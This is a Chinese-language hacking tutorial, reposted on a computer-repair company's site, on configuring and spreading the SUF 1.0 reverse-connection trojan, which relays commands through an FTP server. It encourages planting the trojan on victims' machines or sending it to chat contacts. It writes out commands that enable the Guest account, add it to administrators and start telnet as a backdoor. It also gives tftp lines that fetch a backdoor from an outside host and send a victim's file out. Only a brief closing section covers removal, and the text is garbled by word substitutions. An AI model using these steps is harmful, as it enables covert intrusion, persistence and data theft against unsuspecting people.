网络入侵也玩双通道

  一个14岁的男孩颠末无数次的实验，推出了一款全新的木马——SUF 1.0，该后门运用了“反弹端口原理”与“FTP 隧道技能”，也便是两台机器不间接传输数据，而是利用第三台机器（FTP服务器）来交换数据.
  SUF（Shell Use Ftp）望文生义，便是通过FTP的Shell。这种奥妙的思路真叫绝的，它充实利用防火墙“外严内不严”的毛病，客户端天生服务端后，把客户端主机的IP发送到FTP里，然后他人运行服务端后下载IP文件，然后通过反向连接，使客户端晓得服务端上线，然后把要实行的命令发送到FTP里，服务端再读取FTP里要实行的命令，最后完成实行。
  说了这么一大堆，SUF是不是真的有这么厉害？用事实来阐明一切，跟我来……
  一、技痒——配置服务端
  和一般的木马后门大要雷同，首先将下载下来的SUF 1.0解紧缩，双击运行此中的client.exe，呈现如图1所示的主窗口，非常简便明白吧！点击“配置服务端”按钮，弹出了如图2所示的配置对话窗口，这里仅需要配置一下FTP服务选项。在“FTP”栏中填入一个有写权限的FTP服务器，如：Ftp.abc.com或者220.202.242.98。接着在“端口”栏中填写好FTP服务器端口，默以为21。再在“用户名”和“密码”栏中输入FTP帐户名称和密码，点击“配置服务器”，呈现一提示对话框（如图3），点击“确定”，这时步伐就会开端验证FTP服务器，验证乐成后请选择木马服务端（server.exe）的路径，最后完成配置。
  小提示：如果要给服务端加壳，请在配置服务端之前给服务端（server.exe）加壳，服务端是可重复配置的。同时肯定要确保使用的FTP帐户对FTP服务器有写的权限。
  二、玩弄骨掌——轻松来控制
  接下来是玩木马后门必不可少的环节，那便是莳植木马。莳植木马的方法、途径有很多，曩昔也专门有文章介绍过，各人可以发挥本身的聪明才智，把服务端上传到肉鸡或者发给QQ好友等，当服务端步伐被运行后，一般的使用者很难感觉到盘算机有异常，防火墙也不会呈现报警。实在，一只黑手正在逐步接近，服务端步伐会自动从FTP服务器中获取客户真个IP地址，然后开端反向连接，这时服务端盘算机的IP地址就会出如今客户真个“上线列表”。
  小提示：客户端盘算机必需是间接连接到Internet，而不能是处于内网中，同时，如果开启了防火墙的话，请翻开5915端口。
  在“上线列表”中双击某一在线盘算机的IP（例如：220.202.242.100），呈现“连接到220.202.242.100”对话窗口，这就已经得到了目标盘算机的一个体系权限的Shell，如今想干什么就自在发挥吧！
  想想既然是奉上门的肉鸡，还是留个后门，以便日后再次光顾吧！这里就将Guest帐户激活，并提升为管理员，再开启目标盘算机的Telnet服务，上面就看如何来实现？请输入命令：net user guest /active:yes，点击“运行”来激活Guest帐户，再运行命令：net localgroup administrators guest /add，将Guest加入管理员组，最后再运行命令：net start telnet，开启目标盘算机的远程登录服务。
  实在，在这里有很多东东可以应用的，好比可以通过FTP命令或者TFTP来远程下载/上传文件。这里假定已经晓得有一个TFTP服务器220.202.242.99，我们从服务器上下载一个后门步伐Sy.exe，只需运行命令：tftp 220.202.242.99 get sy.exe；要把肉鸡上的一个数据文档Ccash.doc上传到TFTP服务器只需运行命令：tftp 220.202.242.99 put Ccash.doc。
  小提示：Windows自身附带了一个简单的文件上传下载步伐Tftp.exe，可要建立TFTP服务器，就得借助TFTPD32了（下载地址：http://www.ldcatv.com/soft/tftpd32.rar)。
  三、摆脱控制——隔离隧道
  虽然SUF 1.0的实现方法非常潜伏，可还是能够将其剿除的，可以借助Active Ports(下载地址：http://www.ldcatv.com/soft/aports.rar)等端话柄时监测东西来发现、中断它。如果中了SUF后门，就可在“Active Ports”主窗口中发现两个server.exe进程，此中一个通过4319端口与FTP服务器进行通讯，另一个通过4321端口与客户端盘算机进行通讯（如图6）。选择它们，再点击“Terminate Process”来竣事进程。然后在资源管理器中将server.exe删除，这样就摆脱了SUF的控制。
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：